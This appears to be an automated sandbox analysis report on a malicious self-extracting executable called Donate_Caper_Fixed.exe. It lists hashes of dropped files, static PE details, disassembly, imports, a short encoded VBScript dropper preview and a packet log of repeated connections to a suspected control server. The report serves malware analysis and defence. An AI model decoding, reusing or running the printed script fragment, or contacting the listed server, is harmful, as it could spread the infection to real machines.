SHA1:	93597F8FA3C4BCDF31C48DA2F4EA5F5D135F80A5
SHA-256:	3DF3AEB807A8CE78AB24271246F82A462C40EC4DBE2EE7C4933248CE4F9233EB
SHA-512:	304392C3BAFB0BED1F5809BA1A209D7A3F3FE5D05DAD3D45DB7440B7F7E19D59E047232CC6BB4F16EBA4CFB4BCD58553B2063AF874E4E2634A67320BA6DD737C
Malicious:	false
Preview:	#@~^vgAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vvT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJ/nk/bWx4WkO:KxrYKD&q(V?\JqxX\R+.Nx}Mf+X 8mYE~,T~,0Csk+Jj0AAA==^#~@.

C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe Download File
Process:	C:\Users\user\AppData\Roaming\Donate_Caper2021.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	648192
Entropy (8bit):	6.199573872988717
Encrypted:	false
SSDEEP:	6144:QmHYWuNg9I204YuTsCJRDR0KJp12d7m505bTz2XQnIsh9JUgLzA7w9phShoR9pid:QhT8rR03yQnIUUgo7qSh8Rqn
MD5:	241F61E88F1F7B6ACF5B199B33CB84B9
SHA1:	FB820F9EBA08675BDCE29E626C607E0A73AF6053
SHA-256:	F85BABE98AE9D9BC5BF6A8942ECDAE3476F6755E3564CB6C5524E003662EAC49
SHA-512:	AF36493EEF4FC46CF00D7E15AADFE7919B3D685DD91533ACC8B8799CF7323B8286F1F1247041B2142B78AC9A630D36134B8AAFF34556D8CE1148A077762CCEF2
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....`c`.....................,......~.... ........@.. .......................`............`.................................0...K.... ..d....................@....................................................... ............... ..H............text........ ...................... ..`.sdata...$.......&..................@....rsrc...d.... ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows, RAR self-extracting archive
Entropy (8bit):	7.984884280555744
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Donate_Caper_Fixed.exe
File size:	3422325
MD5:	e462b06d82894c0e3efe75250fa64103
SHA1:	084e56438a8d4be566a1fdbeceeba22a7b7e289c
SHA256:	bf6e3cf654738116a14be298176fc12524154ee51f9a2424fa117ee5b47be53a
SHA512:	a2476c355b5128d0f7d66925f37bc3a495c9064c6436033c7d1812fd2d742eed0868aacdaa649ecb379124f7ff1b6d70e92b73d40a680f68b0fc6c299defdfcb
SSDEEP:	98304:fa/hwP/wQ2+KKSZQIAU5xDmta2BBXzpsy:S+jSZQIBXDkDpx
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*.E.Ka..Ka..Ka..3...Ka..3..HKa..3...Ka..K`./Ka..3...Ka..3...Ka..3...Ka..3...Ka.Rich.Ka.................PE..L...+<.S...........

File Icon


Icon Hash:	e8b4a28ac4c6e674

Static PE Info

General
Entrypoint:	0x41d41b
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:	0x53973C2B [Tue Jun 10 17:11:07 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	d32519c93924bb24d9874d86c5993ee3

Entrypoint Preview

Instruction
call 00007F17A8758562h
jmp 00007F17A8751F7Dh
mov edi, edi
push ebp
mov ebp, esp
push esi
lea eax, dword ptr [ebp+08h]
push eax
mov esi, ecx
call 00007F17A8751D7Fh
mov dword ptr [esi], 0042B1F0h
mov eax, esi
pop esi
pop ebp
retn 0004h
mov dword ptr [ecx], 0042B1F0h
jmp 00007F17A8751E34h
mov edi, edi
push ebp
mov ebp, esp
push esi
mov esi, ecx
mov dword ptr [esi], 0042B1F0h
call 00007F17A8751E21h
test byte ptr [ebp+08h], 00000001h
je 00007F17A8752109h
push esi
call 00007F17A874EA8Bh
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
mov edi, edi
push ebp
mov ebp, esp
push esi
push edi
mov edi, dword ptr [ebp+08h]
mov eax, dword ptr [edi+04h]
test eax, eax
je 00007F17A8752149h
lea edx, dword ptr [eax+08h]
cmp byte ptr [edx], 00000000h
je 00007F17A8752141h
mov esi, dword ptr [ebp+0Ch]
mov ecx, dword ptr [esi+04h]
cmp eax, ecx
je 00007F17A8752116h
add ecx, 08h
push ecx
push edx
call 00007F17A8755A63h
pop ecx
pop ecx
test eax, eax
je 00007F17A8752106h
xor eax, eax
jmp 00007F17A8752126h
test byte ptr [esi], 00000002h
je 00007F17A8752107h
test byte ptr [edi], 00000008h
je 00007F17A87520F4h
mov eax, dword ptr [ebp+10h]
mov eax, dword ptr [eax]
test al, 01h
je 00007F17A8752107h
test byte ptr [edi], 00000001h
je 00007F17A87520E6h
test al, 02h
je 00007F17A8752107h
test byte ptr [edi], 00000002h
je 00007F17A87520DDh
xor eax, eax
inc eax
pop edi
pop esi
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax]
cmp eax, 00004F4Dh

Rich Headers

Programming Language:

[ASM] VS2008 SP1 build 30729
[ C ] VS2008 SP1 build 30729
[LNK] VS2008 SP1 build 30729
[C++] VS2008 SP1 build 30729
[EXP] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x2ef20	0x33	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2dbb4	0xdc	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x51000	0x4488	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x2a3d0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2cbe0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2a000	0x364	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x28553	0x28600	False	0.598375822368	COM executable for DOS	6.72377448341	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x2a000	0x4f53	0x5000	False	0.39482421875	data	5.35227917735	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x2f000	0x218fc	0x1600	False	0.337357954545	COM executable for DOS	3.47002500738	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x51000	0x4488	0x4600	False	0.3484375	data	5.10688613122	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_BITMAP	0x5154c	0xbb6	data
RT_ICON	0x52104	0x128	GLS_BINARY_LSB_FIRST
RT_ICON	0x5222c	0x568	GLS_BINARY_LSB_FIRST
RT_ICON	0x52794	0x2e8	data
RT_ICON	0x52a7c	0x8a8	data
RT_DIALOG	0x53324	0x2c2	data
RT_DIALOG	0x535e8	0x13a	data
RT_DIALOG	0x53724	0xf2	data
RT_DIALOG	0x53818	0x14e	data
RT_DIALOG	0x53968	0x318	data
RT_DIALOG	0x53c80	0x24a	data
RT_STRING	0x53ecc	0x1fc	data
RT_STRING	0x540c8	0x246	data
RT_STRING	0x54310	0x1dc	data
RT_STRING	0x544ec	0xdc	data
RT_STRING	0x545c8	0x43e	data
RT_STRING	0x54a08	0x164	data
RT_STRING	0x54b6c	0xe4	data
RT_STRING	0x54c50	0xfa	data
RT_STRING	0x54d4c	0xba	data
RT_GROUP_ICON	0x54e08	0x3e	data
RT_MANIFEST	0x54e48	0x640	XML 1.0 document, ASCII text, with CRLF line terminators

Imports

DLL	Import
COMCTL32.dll	InitCommonControlsEx
SHLWAPI.dll	SHAutoComplete
KERNEL32.dll	ReadFile, FlushFileBuffers, GetFileAttributesW, SetFileAttributesW, FindClose, FindNextFileW, FindFirstFileW, GetCurrentDirectoryW, GetFullPathNameW, GetModuleFileNameW, FindResourceW, GetModuleHandleW, FreeLibrary, GetProcAddress, LoadLibraryW, GetCurrentProcessId, GetLocaleInfoW, GetNumberFormatW, ExpandEnvironmentStringsW, WaitForSingleObject, GetDateFormatW, GetTimeFormatW, FileTimeToSystemTime, FileTimeToLocalFileTime, GetExitCodeProcess, GetTempPathW, MoveFileExW, Sleep, UnmapViewOfFile, MapViewOfFile, GetCommandLineW, CreateFileMappingW, GetTickCount, SetEnvironmentVariableW, OpenFileMappingW, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, CreateThread, GetProcessAffinityMask, CreateEventW, CreateSemaphoreW, ReleaseSemaphore, ResetEvent, SetEvent, SetThreadPriority, SystemTimeToFileTime, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, WideCharToMultiByte, SetFileTime, GetFileType, IsDBCSLeadByte, GetCPInfo, GlobalAlloc, SetCurrentDirectoryW, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, SetStdHandle, GetLocaleInfoA, GetStringTypeW, GetStringTypeA, LoadLibraryA, GetConsoleMode, GetConsoleCP, InitializeCriticalSectionAndSpinCount, QueryPerformanceCounter, SetHandleCount, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsA, GetModuleHandleA, LCMapStringW, LCMapStringA, IsValidCodePage, GetOEMCP, GetACP, GetModuleFileNameA, ExitProcess, HeapSize, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess, VirtualAlloc, VirtualFree, HeapCreate, InterlockedDecrement, GetCurrentThreadId, InterlockedIncrement, TlsFree, TlsSetValue, TlsAlloc, TlsGetValue, GetStartupInfoA, SetEndOfFile, SetFilePointer, WriteFile, GetStdHandle, GetLongPathNameW, GetShortPathNameW, CompareStringW, MoveFileW, CreateFileW, CreateDirectoryW, DeviceIoControl, RemoveDirectoryW, DeleteFileW, CreateHardLinkW, GetCurrentProcess, CloseHandle, SetLastError, GetLastError, CreateFileA, MultiByteToWideChar, GetCommandLineA, RaiseException, GetSystemTimeAsFileTime, HeapAlloc, HeapReAlloc, HeapFree, RtlUnwind
USER32.dll	EnableWindow, GetDlgItem, ShowWindow, SetWindowLongW, FindWindowExW, GetParent, MapWindowPoints, CreateWindowExW, UpdateWindow, LoadCursorW, RegisterClassExW, DefWindowProcW, DestroyWindow, CopyRect, IsWindow, OemToCharBuffA, LoadIconW, LoadBitmapW, PostMessageW, SetForegroundWindow, MessageBoxW, WaitForInputIdle, IsWindowVisible, DialogBoxParamW, DestroyIcon, SetFocus, GetClassNameW, SendDlgItemMessageW, EndDialog, GetDlgItemTextW, SetDlgItemTextW, wvsprintfW, SendMessageW, GetDC, ReleaseDC, PeekMessageW, GetMessageW, TranslateMessage, DispatchMessageW, LoadStringW, GetWindowRect, GetClientRect, SetWindowPos, GetWindowTextW, SetWindowTextW, GetSystemMetrics, GetWindow, GetWindowLongW, GetSysColor
GDI32.dll	GetObjectW, DeleteObject, GetDeviceCaps, CreateDIBSection
COMDLG32.dll	GetSaveFileNameW, CommDlgExtendedError, GetOpenFileNameW
ADVAPI32.dll	RegOpenKeyExW, RegQueryValueExW, RegCreateKeyExW, RegSetValueExW, RegCloseKey, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges
SHELL32.dll	SHGetMalloc, SHGetSpecialFolderLocation, SHGetFileInfoW, ShellExecuteExW, SHChangeNotify, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW
ole32.dll	CLSIDFromString, CoCreateInstance, OleInitialize, OleUninitialize, CreateStreamOnHGlobal
OLEAUT32.dll	VariantInit

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 3, 2021 05:41:10.246138096 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:10.321053982 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:10.321295977 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:10.324132919 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:10.399028063 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:10.405630112 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:10.432812929 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:10.509955883 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:10.515990973 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:10.577857971 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:15.293653011 CEST	49743	443	192.168.2.4	216.239.32.21
Apr 3, 2021 05:41:15.333223104 CEST	443	49743	216.239.32.21	192.168.2.4
Apr 3, 2021 05:41:15.333395958 CEST	49743	443	192.168.2.4	216.239.32.21
Apr 3, 2021 05:41:15.419856071 CEST	49743	443	192.168.2.4	216.239.32.21
Apr 3, 2021 05:41:15.458060980 CEST	443	49743	216.239.32.21	192.168.2.4
Apr 3, 2021 05:41:15.466068983 CEST	443	49743	216.239.32.21	192.168.2.4
Apr 3, 2021 05:41:15.466098070 CEST	443	49743	216.239.32.21	192.168.2.4
Apr 3, 2021 05:41:15.466110945 CEST	443	49743	216.239.32.21	192.168.2.4
Apr 3, 2021 05:41:15.466208935 CEST	49743	443	192.168.2.4	216.239.32.21
Apr 3, 2021 05:41:15.473937035 CEST	49743	443	192.168.2.4	216.239.32.21
Apr 3, 2021 05:41:15.516087055 CEST	443	49743	216.239.32.21	192.168.2.4
Apr 3, 2021 05:41:15.519365072 CEST	443	49743	216.239.32.21	192.168.2.4
Apr 3, 2021 05:41:15.625083923 CEST	49743	443	192.168.2.4	216.239.32.21
Apr 3, 2021 05:41:15.649019957 CEST	49743	443	192.168.2.4	216.239.32.21
Apr 3, 2021 05:41:15.694118023 CEST	443	49743	216.239.32.21	192.168.2.4
Apr 3, 2021 05:41:15.798491955 CEST	443	49743	216.239.32.21	192.168.2.4
Apr 3, 2021 05:41:16.015976906 CEST	49743	443	192.168.2.4	216.239.32.21
Apr 3, 2021 05:41:19.555469036 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:19.630331039 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:19.630352974 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:19.641307116 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:19.687916994 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:20.947789907 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:21.022888899 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:21.022910118 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:21.029266119 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:21.078663111 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:21.324392080 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:21.407224894 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:21.453830957 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:21.528669119 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:21.604171991 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:21.611516953 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:21.656857014 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:22.048692942 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:22.123528004 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:22.129693031 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:22.188153028 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:23.181457043 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:23.256453037 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:23.263065100 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:23.313303947 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:25.108361006 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:25.184427023 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:25.191785097 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:25.235337019 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:26.207128048 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:26.282156944 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:26.288518906 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:26.454147100 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:27.301667929 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:27.376677990 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:27.383111954 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:27.532300949 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:28.396094084 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:28.471157074 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:28.477504969 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:28.563755035 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:29.492904902 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:29.568083048 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:29.574707031 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:29.766962051 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:30.581106901 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:30.658222914 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:30.665997028 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:30.766994953 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:31.674948931 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:31.749917984 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:31.758702040 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:31.860923052 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:32.773035049 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:32.847877979 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:32.854094982 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:32.946485043 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:34.350575924 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:34.425371885 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:34.433566093 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:34.564273119 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:35.447194099 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:35.522043943 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:35.528716087 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:35.711072922 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:36.535104990 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:36.610042095 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:36.618441105 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:36.767476082 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:37.634335995 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:37.709357977 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:37.716439962 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:37.861336946 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:38.724574089 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:38.800494909 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:38.807815075 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:38.937297106 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:39.816090107 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:39.892358065 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:39.899106979 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:40.049093008 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:40.917584896 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:40.993233919 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:41.000432968 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:41.064697027 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:43.498704910 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:43.574965954 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:43.581237078 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:43.768134117 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:44.597376108 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:44.672333956 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:44.678302050 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:44.768208981 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:45.691366911 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:45.766247988 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:45.772207975 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:45.955787897 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:46.786207914 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:46.861176968 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:46.868726015 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:47.065236092 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:47.879317045 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:47.954304934 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:47.961301088 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:48.065346956 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:48.972852945 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:49.047847033 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:49.055653095 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:49.112322092 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:50.067651033 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:50.142668009 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:50.149429083 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:50.190453053 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:51.160950899 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:51.235929012 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:51.242157936 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:51.284406900 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:52.254483938 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:52.329474926 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:52.336883068 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:52.378217936 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:53.349409103 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:53.424400091 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:53.430629969 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:53.471997976 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:54.442775965 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:54.517740965 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:54.523586988 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:54.565871000 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:55.535865068 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:55.610846043 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:55.617145061 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:55.659765959 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:56.629715919 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:56.705049992 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:56.711776972 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:56.769165993 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:57.723741055 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:57.798656940 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:57.805074930 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:57.847408056 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:59.560698986 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:41:59.635757923 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:59.642456055 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:41:59.691235065 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:00.684667110 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:00.759928942 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:00.769207954 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:00.816382885 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:02.319339991 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:02.394357920 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:02.401407003 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:02.457165956 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:03.411654949 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:03.486677885 CEST	80	49742	188.225.40.161	192.168.2.4
